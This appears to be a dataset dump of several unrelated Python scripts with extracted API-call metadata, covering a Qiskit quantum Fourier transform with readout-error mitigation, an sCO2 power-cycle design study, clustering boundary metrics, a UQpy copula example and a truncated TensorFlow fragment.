"torch.cuda.is_available",
"torch.cuda.empty_cache",
"traceback.print_exc",
"transformers.Trainer",
"sklearn.metrics.accuracy_score",
"torch.device"
] |
[((1036, 1059), 'numpy.argmax', 'np.argmax', (['pred'], {'axis': '(1)'}), '(pred, axis=1)\n', (1045, 1059), True, 'import numpy as np\n'), ((1076, 1118), 'sklearn.metrics.accuracy_score', 'accuracy_score', ([], {'y_true': 'labels', 'y_pred': 'pred'}), '(y_true=labels, y_pred=pred)\n', (1090, 1118), False, 'from sklearn.metrics import accuracy_score, recall_score, precision_score, f1_score\n'), ((1132, 1172), 'sklearn.metrics.recall_score', 'recall_score', ([], {'y_true': 'labels', 'y_pred': 'pred'}), '(y_true=labels, y_pred=pred)\n', (1144, 1172), False, 'from sklearn.metrics import accuracy_score, recall_score, precision_score, f1_score\n'), ((1189, 1232), 'sklearn.metrics.precision_score', 'precision_score', ([], {'y_true': 'labels', 'y_pred': 'pred'}), '(y_true=labels, y_pred=pred)\n', (1204, 1232), False, 'from sklearn.metrics import accuracy_score, recall_score, precision_score, f1_score\n'), ((1242, 1278), 'sklearn.metrics.f1_score', 'f1_score', ([], {'y_true': 'labels', 'y_pred': 'pred'}), '(y_true=labels, y_pred=pred)\n', (1250, 1278), False, 'from sklearn.metrics import accuracy_score, recall_score, precision_score, f1_score\n'), ((1640, 1673), 'pandas.read_csv', 'pd.read_csv', (['input_file'], {'sep': '"""\t"""'}), "(input_file, sep='\\t')\n", (1651, 1673), True, 'import pandas as pd\n'), ((1807, 1848), 'transformers.BertTokenizer.from_pretrained', 'BertTokenizer.from_pretrained', (['model_name'], {}), '(model_name)\n', (1836, 1848), False, 'from transformers import BertTokenizer, BertForSequenceClassification\n'), ((1861, 1932), 'transformers.BertForSequenceClassification.from_pretrained', 'BertForSequenceClassification.from_pretrained', (['model_name'], {'num_labels': '(2)'}), '(model_name, num_labels=2)\n', (1906, 1932), False, 'from transformers import BertTokenizer, BertForSequenceClassification\n'), ((2422, 2460), 'sklearn.model_selection.train_test_split', 'train_test_split', (['X', 'y'], {'test_size': '(0.01)'}), '(X, y, test_size=0.01)\n', (2438, 2460), False, 'from sklearn.model_selection import train_test_split\n'), ((3594, 3924), 'transformers.TrainingArguments', 'TrainingArguments', ([], {'output_dir': 'output_dir', 'evaluation_strategy': '"""steps"""', 'eval_steps': '(100)', 'save_steps': '(100)', 'warmup_steps': '(500)', 'per_device_train_batch_size': '(32)', 'per_device_eval_batch_size': '(32)', 'num_train_epochs': '(5)', 'seed': '(0)', 'load_best_model_at_end': '(True)', 'logging_dir': '"""./logs"""', 'logging_steps': '(10)', 'metric_for_best_model': '"""accuracy"""'}), "(output_dir=output_dir, evaluation_strategy='steps',\n eval_steps=100, save_steps=100, warmup_steps=500,\n per_device_train_batch_size=32, per_device_eval_batch_size=32,\n num_train_epochs=5, seed=0, load_best_model_at_end=True, logging_dir=\n './logs', logging_steps=10, metric_for_best_model='accuracy')\n", (3611, 3924), False, 'from transformers import TrainingArguments, Trainer\n'), ((4149, 4273), 'transformers.Trainer', 'Trainer', ([], {'model': 'model', 'args': 'args', 'train_dataset': 'train_dataset', 'eval_dataset': 'val_dataset', 'compute_metrics': 'compute_metrics'}), '(model=model, args=args, train_dataset=train_dataset, eval_dataset=\n val_dataset, compute_metrics=compute_metrics)\n', (4156, 4273), False, 'from transformers import TrainingArguments, Trainer\n'), ((4562, 4678), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Fine tune model """', 'formatter_class': 'argparse.ArgumentDefaultsHelpFormatter'}), "(description='Fine tune model ', 
formatter_class=\n argparse.ArgumentDefaultsHelpFormatter)\n", (4585, 4678), False, 'import argparse\n'), ((1970, 1995), 'torch.cuda.is_available', 'torch.cuda.is_available', ([], {}), '()\n', (1993, 1995), False, 'import torch\n'), ((1946, 1966), 'torch.device', 'torch.device', (['"""cuda"""'], {}), "('cuda')\n", (1958, 1966), False, 'import torch\n'), ((2001, 2020), 'torch.device', 'torch.device', (['"""cpu"""'], {}), "('cpu')\n", (2013, 2020), False, 'import torch\n'), ((5590, 5614), 'torch.cuda.empty_cache', 'torch.cuda.empty_cache', ([], {}), '()\n', (5612, 5614), False, 'import torch\n'), ((711, 733), 'torch.tensor', 'torch.tensor', (['val[idx]'], {}), '(val[idx])\n', (723, 733), False, 'import torch\n'), ((827, 857), 'torch.tensor', 'torch.tensor', (['self.labels[idx]'], {}), '(self.labels[idx])\n', (839, 857), False, 'import torch\n'), ((5716, 5752), 'traceback.print_exc', 'traceback.print_exc', ([], {'file': 'sys.stdout'}), '(file=sys.stdout)\n', (5735, 5752), False, 'import traceback\n'), ((5689, 5703), 'sys.exc_info', 'sys.exc_info', ([], {}), '()\n', (5701, 5703), False, 'import sys\n')]
|
from qft import get_fft_from_counts, loadBackend, qft_framework
from fft import fft_framework
from frontend import frontend, signal, transform
from qiskit.circuit.library import QFT as qiskit_qft
# --- Standard imports
# Importing standard Qiskit libraries and configuring account
from qiskit import QuantumCircuit, execute, Aer, IBMQ
from qiskit.compiler import transpile, assemble
from qiskit.tools.jupyter import *
from qiskit.visualization import *
# Loading your IBM Q account(s)
provider = IBMQ.load_account()
# --- Imports
from qiskit import QuantumCircuit, execute, BasicAer
from qiskit.tools.monitor import job_monitor
import math
from numpy import linalg as LA
import numpy as np
#%config jupy = 'svg' # Makes the images look nice
# --- Computation of the calibration matrix
from qiskit.ignis.mitigation.measurement import (complete_meas_cal,CompleteMeasFitter)
from qiskit import *
nQubits = 4
nShots = 2048
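# complete_meas_cal prepares one calibration circuit per computational basis
# state; running them on the backend lets CompleteMeasFitter estimate the
# readout (assignment) error matrix, whose filter is applied to the raw counts
# further below.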
qr = QuantumRegister(nQubits)
meas_calibs, state_labels = complete_meas_cal(qr=qr, circlabel='mcal')
_, backend = loadBackend('ibmq_quito', True)
job = execute(meas_calibs, backend=backend, shots=1000)
# job_monitor(job, interval = 3)
cal_results = job.result()
meas_fitter = CompleteMeasFitter(cal_results, state_labels, circlabel='mcal')
print(meas_fitter.cal_matrix)
q = QuantumRegister(4,'q')
qc = QuantumCircuit(q)
# Normalize the amplitudes so that their squares sum to 1 (required for state initialization)
ys = signal(samplingRate=1000, amplification=1, duration=0, nSamples=2**nQubits)
ys.addFrequency(125)
ys.addFrequency(250)
y = ys.sample()
plotData = ys.show(subplot=[1,4,1], title='signal')
print("Processing FFT")
fft = transform(fft_framework)
y_hat, f = fft.forward(ys)
y_hat_ideal_p, f_p = fft.postProcess(y_hat, f)
plotData = fft.show(y_hat_ideal_p, f_p, subplot=[1,4,2], title="FFT (ref)")
# y.addFrequency(250)
ampls = y / np.linalg.norm(y)
# For 2**n amplitudes we need n qubits for the initialization;
# the binary (basis-state) indexing of the samples happens exactly here.
qc.initialize(ampls, [q[i] for i in range(nQubits)])
qc += qiskit_qft(num_qubits=nQubits, approximation_degree=0, do_swaps=True, inverse=False, insert_barriers=False, name='qft')
qc.measure_all()
qc = transpile(qc, backend, optimization_level=1) # opt level 0,1..3. 3: heaviest opt
job = execute(qc, backend, shots = nShots)
#job = execute(qc, BasicAer.get_backend('qasm_simulator'), shots = shots)
result = job.result()
# print(result.get_counts())
genTransform = transform(None)
y_hat = np.array(get_fft_from_counts(result.get_counts(), nQubits))
f = genTransform.calcFreqArray(ys, y_hat)
y_hat_sim_p, f_p = genTransform.postProcess(y_hat, f)
plotData = genTransform.show(y_hat_sim_p, f_p, subplot=[1,4,3], title=f"qft_sim_n")
print(y_hat)
# Get the filter object
meas_filter = meas_fitter.filter
# Results with mitigation
mitigated_results = meas_filter.apply(result)
mitigated_counts = mitigated_results.get_counts(0)
# print(mitigated_counts)
y_hat = np.array(get_fft_from_counts(mitigated_counts, nQubits))
f = genTransform.calcFreqArray(ys, y_hat)
y_hat_sim_p, f_p = genTransform.postProcess(y_hat, f)
plotData = genTransform.show(y_hat_sim_p, f_p, subplot=[1,4,4], title=f"qft_sim_n_f")
print(y_hat)
frontend.primeTime()
|
[
"frontend.signal",
"qiskit.execute",
"qiskit.compiler.transpile",
"qft.loadBackend",
"qiskit.ignis.mitigation.measurement.complete_meas_cal",
"qiskit.IBMQ.load_account",
"qiskit.circuit.library.QFT",
"frontend.transform",
"numpy.linalg.norm",
"qiskit.QuantumCircuit",
"qft.get_fft_from_counts",
"qiskit.ignis.mitigation.measurement.CompleteMeasFitter",
"frontend.frontend.primeTime"
] |
[((499, 518), 'qiskit.IBMQ.load_account', 'IBMQ.load_account', ([], {}), '()\n', (516, 518), False, 'from qiskit import QuantumCircuit, execute, Aer, IBMQ\n'), ((997, 1039), 'qiskit.ignis.mitigation.measurement.complete_meas_cal', 'complete_meas_cal', ([], {'qr': 'qr', 'circlabel': '"""mcal"""'}), "(qr=qr, circlabel='mcal')\n", (1014, 1039), False, 'from qiskit.ignis.mitigation.measurement import complete_meas_cal, CompleteMeasFitter\n'), ((1053, 1084), 'qft.loadBackend', 'loadBackend', (['"""ibmq_quito"""', '(True)'], {}), "('ibmq_quito', True)\n", (1064, 1084), False, 'from qft import get_fft_from_counts, loadBackend, qft_framework\n'), ((1091, 1140), 'qiskit.execute', 'execute', (['meas_calibs'], {'backend': 'backend', 'shots': '(1000)'}), '(meas_calibs, backend=backend, shots=1000)\n', (1098, 1140), False, 'from qiskit import QuantumCircuit, execute, BasicAer\n'), ((1216, 1279), 'qiskit.ignis.mitigation.measurement.CompleteMeasFitter', 'CompleteMeasFitter', (['cal_results', 'state_labels'], {'circlabel': '"""mcal"""'}), "(cal_results, state_labels, circlabel='mcal')\n", (1234, 1279), False, 'from qiskit.ignis.mitigation.measurement import complete_meas_cal, CompleteMeasFitter\n'), ((1350, 1367), 'qiskit.QuantumCircuit', 'QuantumCircuit', (['q'], {}), '(q)\n', (1364, 1367), False, 'from qiskit import QuantumCircuit, execute, BasicAer\n'), ((1435, 1512), 'frontend.signal', 'signal', ([], {'samplingRate': '(1000)', 'amplification': '(1)', 'duration': '(0)', 'nSamples': '(2 ** nQubits)'}), '(samplingRate=1000, amplification=1, duration=0, nSamples=2 ** nQubits)\n', (1441, 1512), False, 'from frontend import frontend, signal, transform\n'), ((1655, 1679), 'frontend.transform', 'transform', (['fft_framework'], {}), '(fft_framework)\n', (1664, 1679), False, 'from frontend import frontend, signal, transform\n'), ((2071, 2194), 'qiskit.circuit.library.QFT', 'qiskit_qft', ([], {'num_qubits': 'nQubits', 'approximation_degree': '(0)', 'do_swaps': '(True)', 'inverse': '(False)', 'insert_barriers': '(False)', 'name': '"""qft"""'}), "(num_qubits=nQubits, approximation_degree=0, do_swaps=True,\n inverse=False, insert_barriers=False, name='qft')\n", (2081, 2194), True, 'from qiskit.circuit.library import QFT as qiskit_qft\n'), ((2214, 2258), 'qiskit.compiler.transpile', 'transpile', (['qc', 'backend'], {'optimization_level': '(1)'}), '(qc, backend, optimization_level=1)\n', (2223, 2258), False, 'from qiskit.compiler import transpile, assemble\n'), ((2301, 2335), 'qiskit.execute', 'execute', (['qc', 'backend'], {'shots': 'nShots'}), '(qc, backend, shots=nShots)\n', (2308, 2335), False, 'from qiskit import QuantumCircuit, execute, BasicAer\n'), ((2484, 2499), 'frontend.transform', 'transform', (['None'], {}), '(None)\n', (2493, 2499), False, 'from frontend import frontend, signal, transform\n'), ((3250, 3270), 'frontend.frontend.primeTime', 'frontend.primeTime', ([], {}), '()\n', (3268, 3270), False, 'from frontend import frontend, signal, transform\n'), ((1868, 1885), 'numpy.linalg.norm', 'np.linalg.norm', (['y'], {}), '(y)\n', (1882, 1885), True, 'import numpy as np\n'), ((3004, 3050), 'qft.get_fft_from_counts', 'get_fft_from_counts', (['mitigated_counts', 'nQubits'], {}), '(mitigated_counts, nQubits)\n', (3023, 3050), False, 'from qft import get_fft_from_counts, loadBackend, qft_framework\n')]
|
# -*- coding: utf-8 -*-
"""
Created on Fri Jun 9 10:56:12 2017
@author: tneises
"""
import json
import matplotlib.pyplot as plt
import numpy as np
import matplotlib.lines as mlines
import sys
import os
absFilePath = os.path.abspath(__file__)
fileDir = os.path.dirname(os.path.abspath(__file__))
parentDir = os.path.dirname(fileDir)
newPath = os.path.join(parentDir, 'core')
sys.path.append(newPath)
import sco2_cycle_ssc as sco2_solve
import sco2_plots as cy_plt
##########################################
"Cycle design simulation with default parameters"
c_sco2 = sco2_solve.C_sco2_sim(1) # Initialize to the recompression cycle default (1)
c_sco2.solve_sco2_case() # Run design simulation
print(c_sco2.m_solve_dict)
print("\nDid the simulation code solve successfully = ",c_sco2.m_solve_success)
c_sco2.m_also_save_csv = True
c_sco2.save_m_solve_dict("design_solution__default_pars") # Save design solution dictionary
sol_dict__default_pars = c_sco2.m_solve_dict
##########################################
"Plotting a cycle design"
c_plot = cy_plt.C_sco2_TS_PH_plot(sol_dict__default_pars)
c_plot.is_save_plot = True
c_plot.file_name = "cycle_design_plots__default_pars"
c_plot.plot_new_figure()
##########################################
"Modifying the cycle design parameters"
mod_base_dict = {"T_htf_hot_des" : 620, "cycle_config" : 2}
c_sco2.overwrite_des_par_base(mod_base_dict) # Overwrite baseline design parameters
c_sco2.solve_sco2_case() # Run design simulation
print(c_sco2.m_solve_dict)
print("\nDid the simulation code with"
"modified design parameters solve successfully = ",c_sco2.m_solve_success)
c_sco2.m_also_save_csv = True
c_sco2.save_m_solve_dict("design_solution__modified_pars") # Save design solution dictionary
sol_dict__mod_pars = c_sco2.m_solve_dict
##########################################
"Comparing two cycle designs"
c_comp_plot = cy_plt.C_sco2_TS_PH_overlay_plot(sol_dict__default_pars, sol_dict__mod_pars)
c_comp_plot.is_save_plot = True
c_comp_plot.plot_new_figure()
##########################################
"Running a parametric study on one design parameter"
c_sco2.reset_des_par_base_to_default_RC()
T_HTF_in_par_list = list(np.arange(570,721,25))
T_HTF_in_par_dict_list = []
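# One parametric case per HTF hot inlet temperature in np.arange(570, 721, 25);
# each dictionary overrides only the T_htf_hot_des design parameter on top of
# the default baseline restored above.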
for T_HTF_in in T_HTF_in_par_list:
T_HTF_in_par_dict_list.append({"T_htf_hot_des" : T_HTF_in})
c_sco2.solve_sco2_parametric(T_HTF_in_par_dict_list)
print("\nDid the parametric analyses solve successfully = ",c_sco2.m_par_solve_success)
c_sco2.m_also_save_csv = True
c_sco2.save_m_par_solve_dict("T_HTF_parametric")
sol_dict_parametric = c_sco2.m_par_solve_dict
##########################################
"Plotting a 1D parametric study"
par_plot = cy_plt.C_des_stacked_outputs_plot([sol_dict_parametric])
par_plot.x_var = "T_HTF"
par_plot.y_vars = ["eta","MC_P_in","PHX_dT"]
par_plot.is_legend = False
par_plot.max_rows = 2
par_plot.is_save = True
par_plot.file_name = "T_HTF_par_plot"
par_plot.create_plot()
##########################################
"Plotting one cycle design from a parametric solution dictionary"
i_plot = len(sol_dict_parametric["T_htf_hot_des"]) - 1
dict_i_plot = sco2_solve.get_one_des_dict_from_par_des_dict(sol_dict_parametric, "T_htf_hot_des", i_plot)
c_i_cycle_plot = cy_plt.C_sco2_TS_PH_plot(dict_i_plot)
c_i_cycle_plot.is_save_plot = True
c_i_cycle_plot.file_name = "cycle_design_plots__T_HTF_hottest"
c_i_cycle_plot.plot_new_figure()
##########################################
##########################################
##########################################
##########################################
##########################################
|
[
"sco2_plots.C_sco2_TS_PH_overlay_plot",
"sco2_plots.C_sco2_TS_PH_plot",
"os.path.join",
"os.path.dirname",
"sco2_cycle_ssc.C_sco2_sim",
"sco2_plots.C_des_stacked_outputs_plot",
"sco2_cycle_ssc.get_one_des_dict_from_par_des_dict",
"os.path.abspath",
"sys.path.append",
"numpy.arange"
] |
[((223, 248), 'os.path.abspath', 'os.path.abspath', (['__file__'], {}), '(__file__)\n', (238, 248), False, 'import os\n'), ((314, 338), 'os.path.dirname', 'os.path.dirname', (['fileDir'], {}), '(fileDir)\n', (329, 338), False, 'import os\n'), ((349, 380), 'os.path.join', 'os.path.join', (['parentDir', '"""core"""'], {}), "(parentDir, 'core')\n", (361, 380), False, 'import os\n'), ((382, 406), 'sys.path.append', 'sys.path.append', (['newPath'], {}), '(newPath)\n', (397, 406), False, 'import sys\n'), ((578, 602), 'sco2_cycle_ssc.C_sco2_sim', 'sco2_solve.C_sco2_sim', (['(1)'], {}), '(1)\n', (599, 602), True, 'import sco2_cycle_ssc as sco2_solve\n'), ((1072, 1120), 'sco2_plots.C_sco2_TS_PH_plot', 'cy_plt.C_sco2_TS_PH_plot', (['sol_dict__default_pars'], {}), '(sol_dict__default_pars)\n', (1096, 1120), True, 'import sco2_plots as cy_plt\n'), ((1920, 1996), 'sco2_plots.C_sco2_TS_PH_overlay_plot', 'cy_plt.C_sco2_TS_PH_overlay_plot', (['sol_dict__default_pars', 'sol_dict__mod_pars'], {}), '(sol_dict__default_pars, sol_dict__mod_pars)\n', (1952, 1996), True, 'import sco2_plots as cy_plt\n'), ((2727, 2783), 'sco2_plots.C_des_stacked_outputs_plot', 'cy_plt.C_des_stacked_outputs_plot', (['[sol_dict_parametric]'], {}), '([sol_dict_parametric])\n', (2760, 2783), True, 'import sco2_plots as cy_plt\n'), ((3168, 3263), 'sco2_cycle_ssc.get_one_des_dict_from_par_des_dict', 'sco2_solve.get_one_des_dict_from_par_des_dict', (['sol_dict_parametric', '"""T_htf_hot_des"""', 'i_plot'], {}), "(sol_dict_parametric,\n 'T_htf_hot_des', i_plot)\n", (3213, 3263), True, 'import sco2_cycle_ssc as sco2_solve\n'), ((3277, 3314), 'sco2_plots.C_sco2_TS_PH_plot', 'cy_plt.C_sco2_TS_PH_plot', (['dict_i_plot'], {}), '(dict_i_plot)\n', (3301, 3314), True, 'import sco2_plots as cy_plt\n'), ((275, 300), 'os.path.abspath', 'os.path.abspath', (['__file__'], {}), '(__file__)\n', (290, 300), False, 'import os\n'), ((2223, 2246), 'numpy.arange', 'np.arange', (['(570)', '(721)', '(25)'], {}), '(570, 721, 25)\n', (2232, 2246), True, 'import numpy as np\n')]
|
### evaluation
import numpy as np
from sklearn.linear_model import LinearRegression
class Evaluate(object):
def __init__(self, model_names, X_train, y_preds, config,verbose=0):
        self.distance_min = config['distance_min']  # e.g. 0.05
        self.point_min = config['point_min']  # e.g. 50
self.model_names = model_names
self.X_train= X_train
self.y_preds = y_preds
self.verbose = verbose
self.metrics = {'ratios':{}, 'slopes': {}, 'inters':{}, 'slopes_raw':{}}
self.boundary_points = {}
def fit(self):
for model_name in self.model_names:
ratios = get_ratio_range(self.X_train, self.y_preds[model_name])
slopes, inters, slopes_raw, boundaries = get_boundary_and_slope(self.X_train, self.y_preds[model_name], self.distance_min, self.point_min)
self.metrics['ratios'][model_name] =ratios
self.metrics['slopes'][model_name] = slopes
self.metrics['slopes_raw'][model_name] = slopes_raw
self.metrics['inters'][model_name] = inters
self.boundary_points[model_name] = boundaries
if self.verbose:
print('model_name {}, metrics ratios {}, slopes {}, inters{}'.format(model_name,
self.metrics['ratios'][model_name], self.metrics['slopes'][model_name],
self.metrics['inters'][model_name]))
return self
def get_ratio_range(X_train, y_pred):
"""
Compute range ratio index
"""
range_ratios=[]
n_components = max(y_pred)+1
for i in range(n_components):
X_train_i = X_train[y_pred==i]
T2_v = 10**(X_train_i[:,0])
T1_v = 10**(X_train_i[:,1])
range_ratio = (np.max(T1_v/T2_v)/np.min(T1_v/T2_v))
range_ratios.append(range_ratio)
return range_ratios
def get_boundary_from_two_clusters_(cluster_a, cluster_b, distance_min = 0.05):
# cluster_a: shape(n,2)
# cluster_b: shape(n,2)
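    # For every point in cluster_a, find its nearest point in cluster_b; if the
    # two are closer than distance_min, both are flagged as boundary points.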
id_a =set()
id_b =set()# the pair of row id (i,j), i is for cluster_a and j is for cluster_b
for i in range(cluster_a.shape[0]):
        cluster_a_i = cluster_a[i,:]
        distance_list = np.sqrt( (cluster_a_i[0]-cluster_b[:,0])**2 + (cluster_a_i[1]-cluster_b[:,1])**2)
        distance_ = np.amin(distance_list) # minimum distance to any point in cluster_b
if distance_ < distance_min:
j = np.argmin(distance_list)
id_a.add(i)
id_b.add(j)
    if len(id_a) == 0 and len(id_b) == 0:
return []
else:
id_a = list(id_a)
id_b = list(id_b)
id_a.sort()
id_b.sort()
boundary_points = np.vstack( (cluster_a[id_a,:],cluster_b[id_b,:] ) )
return boundary_points
def get_boundary_and_slope(X_train, y_pred, distance_min=0.05, point_min = 50):
    # point_min: minimum number of boundary points required to keep a boundary
    # Compute the decision boundaries between clusters and their slopes.
boundary_list = [] # contains all boundary points
slope_raw_list = []
angle_diff_list = [] # contains the slope for that boundary
inter_list = []
n_components = max(y_pred)+1
data_all = [X_train[y_pred==i] for i in range(n_components)] # get each cluster points
for i in range(n_components-1):
for j in range(i+1, n_components):
cluster_a = data_all[i]
cluster_b = data_all[j]
boundary_points = get_boundary_from_two_clusters_(cluster_a, cluster_b,distance_min = distance_min)
if len(boundary_points) > point_min:
boundary_list.append(boundary_points)
# linear regression
lr_ = LinearRegression()
X_ = boundary_points[:,0].reshape(-1,1)
y_ = boundary_points[:,1]
lr_.fit(X_,y_)
                slope = np.arctan(lr_.coef_[0])/np.pi*180  # angle of the fitted boundary line in degrees
inter = lr_.intercept_
slope_raw_list.append(slope)
inter_list.append(inter)
diff_slope = abs(slope-45)
angle_diff_list.append(diff_slope) # normalize slope
return angle_diff_list, inter_list, slope_raw_list, boundary_list
|
[
"numpy.sqrt",
"numpy.amin",
"numpy.max",
"numpy.vstack",
"numpy.min",
"numpy.argmin",
"sklearn.linear_model.LinearRegression"
] |
[((2206, 2300), 'numpy.sqrt', 'np.sqrt', (['((clsuter_a_i[0] - cluster_b[:, 0]) ** 2 + (clsuter_a_i[1] - cluster_b[:, 1\n ]) ** 2)'], {}), '((clsuter_a_i[0] - cluster_b[:, 0]) ** 2 + (clsuter_a_i[1] -\n cluster_b[:, 1]) ** 2)\n', (2213, 2300), True, 'import numpy as np\n'), ((2308, 2330), 'numpy.amin', 'np.amin', (['distance_list'], {}), '(distance_list)\n', (2315, 2330), True, 'import numpy as np\n'), ((2661, 2712), 'numpy.vstack', 'np.vstack', (['(cluster_a[id_a, :], cluster_b[id_b, :])'], {}), '((cluster_a[id_a, :], cluster_b[id_b, :]))\n', (2670, 2712), True, 'import numpy as np\n'), ((1750, 1769), 'numpy.max', 'np.max', (['(T1_v / T2_v)'], {}), '(T1_v / T2_v)\n', (1756, 1769), True, 'import numpy as np\n'), ((1768, 1787), 'numpy.min', 'np.min', (['(T1_v / T2_v)'], {}), '(T1_v / T2_v)\n', (1774, 1787), True, 'import numpy as np\n'), ((2400, 2424), 'numpy.argmin', 'np.argmin', (['distance_list'], {}), '(distance_list)\n', (2409, 2424), True, 'import numpy as np\n'), ((3637, 3655), 'sklearn.linear_model.LinearRegression', 'LinearRegression', ([], {}), '()\n', (3653, 3655), False, 'from sklearn.linear_model import LinearRegression\n')]
|
"""
orbit.py
"Frankly, a very limited and highly specific implementation of an Orbit class.
If used for applications other than the original usecase, this class will
either need to be bypassed or heavily expanded upon."
@author: <NAME> (https://github.com/Hans-Bananendans/)
"""
from numpy import log
class Orbit:
"""This class stores and supplies orbital parameters for given circular
SSO orbit"""
def __init__(self,h,i,LTAN):
self.h = h #[km]
self.i = i #[deg]
self.LTAN = LTAN #0-23[h] e.g. 14 is 14:00
def period(self):
"""
Parameters
----------
h : double
Orbital altitude in [km].
Returns
-------
int
Orbital period in [s].
"""
return int(2*3.141593 * ((1000*(6371+self.h))**3/(3.986*10**14))**0.5)
def eclipse(self):
"""
eclipse(h)
Note: Only valid between LTAN [10:00, 11:00], based on logarithmic
regression of simulated eclipse data in GMAT. For more info,
consult eclipse_predictions.xlsx.
ACCURATE TO WITHIN A FEW SECONDS
Parameters
----------
h : double
Orbital altitude in [km].
Returns
-------
double
Total eclipse duration (including penumbras) in [s].
"""
# If LTAN is 10:00
# e = -151*log(self.h) + 2965 # [s]
# If LTAN is 10:30
e = -125*log(self.h) + 2860 # [s]
# If LTAN is 11:00
# e = -109*log(self.h) + 2800 # [s]
return e
def eclipse_frac(self):
"""
        eclipse_frac(h)
Note: Only valid for LTAN 10:00, 10:30, 11:00, based on logarithmic
regression of simulated eclipse data in GMAT. For more info,
consult eclipse_predictions.xlsx.
ACCURACY TO WITHIN 0.1 OF TRUE VALUE
Parameters
----------
h : double
Orbital altitude in [km].
Returns
-------
double
            Fraction of the orbit spent in eclipse [-].
"""
return self.eclipse()/self.period()
|
[
"numpy.log"
] |
[((1541, 1552), 'numpy.log', 'log', (['self.h'], {}), '(self.h)\n', (1544, 1552), False, 'from numpy import log\n')]
|
"""
Multivariate from independent marginals and copula
==================================================
"""
#%% md
#
# - How to define a bivariate distribution from independent marginals and change its structure based on a copula supported by UQpy
# - How to plot the pdf of the distribution
# - How to modify the parameters of the distribution
#%%
#%% md
#
# Import the necessary modules.
#%%
import numpy as np
import matplotlib.pyplot as plt
#%% md
#
# Example of a multivariate distribution from joint independent marginals
# ------------------------------------------------------------------------
#%%
from UQpy.distributions import Normal, JointIndependent
from UQpy.distributions import Gumbel, JointCopula
#%% md
#
# Define a Copula
# ---------------
# The definition of a bivariate distribution with a copula is similar to defining a multivariate distribution from
# independent marginals: in both cases a list of marginals needs to be defined. In the case of a copula-based joint,
# a copula object describing the dependence structure is provided in addition to the marginals.
#%%
marginals = [Normal(loc=0., scale=1), Normal(loc=0., scale=1)]
copula = Gumbel(theta=3.)
# dist_1 is a multivariate normal with independent marginals
dist_1 = JointIndependent(marginals)
print('Does the distribution with independent marginals have an rvs method?')
print(hasattr(dist_1, 'rvs'))
# dist_2 exhibits dependence between the two dimensions, defined using a gumbel copula
dist_2 = JointCopula(marginals=marginals, copula=copula)
print('Does the distribution with copula have an rvs method?')
print(hasattr(dist_2, 'rvs'))
#%% md
#
# Plot the pdf of the distribution before and after the copula
# -------------------------------------------------------------
#
#%%
fig, ax = plt.subplots(ncols=2, figsize=(10, 4))
x = np.arange(-3, 3, 0.1)
y = np.arange(-3, 3, 0.1)
X, Y = np.meshgrid(x, y)
Z = dist_1.pdf(x=np.concatenate([X.reshape((-1, 1)), Y.reshape((-1, 1))], axis=1))
CS = ax[0].contour(X, Y, Z.reshape(X.shape))
ax[0].clabel(CS, inline=1, fontsize=10)
ax[0].set_title('Contour plot of pdf - independent normals')
x = np.arange(-3, 3, 0.1)
y = np.arange(-3, 3, 0.1)
X, Y = np.meshgrid(x, y)
Z = dist_2.pdf(x=np.concatenate([X.reshape((-1, 1)), Y.reshape((-1, 1))], axis=1))
CS = ax[1].contour(X, Y, Z.reshape(X.shape))
ax[1].clabel(CS, inline=1, fontsize=10)
ax[1].set_title('Contour plot of pdf - normals with Gumbel copula')
plt.show()
#%% md
#
# Modify the parameters of the multivariate copula.
# -------------------------------------------------
#
# Use the update_parameters method.
#%%
print(dist_2.copula.parameters)
dist_2.update_parameters(theta_c=2.)
print(dist_2.copula.parameters)
|
[
"UQpy.distributions.JointCopula",
"UQpy.distributions.JointIndependent",
"UQpy.distributions.Normal",
"UQpy.distributions.Gumbel",
"numpy.meshgrid",
"matplotlib.pyplot.subplots",
"numpy.arange",
"matplotlib.pyplot.show"
] |
[((1055, 1072), 'UQpy.distributions.Gumbel', 'Gumbel', ([], {'theta': '(3.0)'}), '(theta=3.0)\n', (1061, 1072), False, 'from UQpy.distributions import Gumbel, JointCopula\n'), ((1143, 1170), 'UQpy.distributions.JointIndependent', 'JointIndependent', (['marginals'], {}), '(marginals)\n', (1159, 1170), False, 'from UQpy.distributions import Normal, JointIndependent\n'), ((1376, 1423), 'UQpy.distributions.JointCopula', 'JointCopula', ([], {'marginals': 'marginals', 'copula': 'copula'}), '(marginals=marginals, copula=copula)\n', (1387, 1423), False, 'from UQpy.distributions import Gumbel, JointCopula\n'), ((1672, 1710), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {'ncols': '(2)', 'figsize': '(10, 4)'}), '(ncols=2, figsize=(10, 4))\n', (1684, 1710), True, 'import matplotlib.pyplot as plt\n'), ((1716, 1737), 'numpy.arange', 'np.arange', (['(-3)', '(3)', '(0.1)'], {}), '(-3, 3, 0.1)\n', (1725, 1737), True, 'import numpy as np\n'), ((1742, 1763), 'numpy.arange', 'np.arange', (['(-3)', '(3)', '(0.1)'], {}), '(-3, 3, 0.1)\n', (1751, 1763), True, 'import numpy as np\n'), ((1771, 1788), 'numpy.meshgrid', 'np.meshgrid', (['x', 'y'], {}), '(x, y)\n', (1782, 1788), True, 'import numpy as np\n'), ((2023, 2044), 'numpy.arange', 'np.arange', (['(-3)', '(3)', '(0.1)'], {}), '(-3, 3, 0.1)\n', (2032, 2044), True, 'import numpy as np\n'), ((2049, 2070), 'numpy.arange', 'np.arange', (['(-3)', '(3)', '(0.1)'], {}), '(-3, 3, 0.1)\n', (2058, 2070), True, 'import numpy as np\n'), ((2078, 2095), 'numpy.meshgrid', 'np.meshgrid', (['x', 'y'], {}), '(x, y)\n', (2089, 2095), True, 'import numpy as np\n'), ((2332, 2342), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (2340, 2342), True, 'import matplotlib.pyplot as plt\n'), ((996, 1020), 'UQpy.distributions.Normal', 'Normal', ([], {'loc': '(0.0)', 'scale': '(1)'}), '(loc=0.0, scale=1)\n', (1002, 1020), False, 'from UQpy.distributions import Normal, JointIndependent\n'), ((1021, 1045), 'UQpy.distributions.Normal', 'Normal', ([], {'loc': '(0.0)', 'scale': '(1)'}), '(loc=0.0, scale=1)\n', (1027, 1045), False, 'from UQpy.distributions import Normal, JointIndependent\n')]
|
from __future__ import absolute_import, division, print_function
import numpy as np
import tensorflow as tf
from IPython.core.debugger import Tracer; debug_here = Tracer();
batch_size = 5
max_it = tf.constant(6)
char_mat_1 = [[0.0, 0.0, 0.0, 0.9, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.9, 0.0, 0.0],
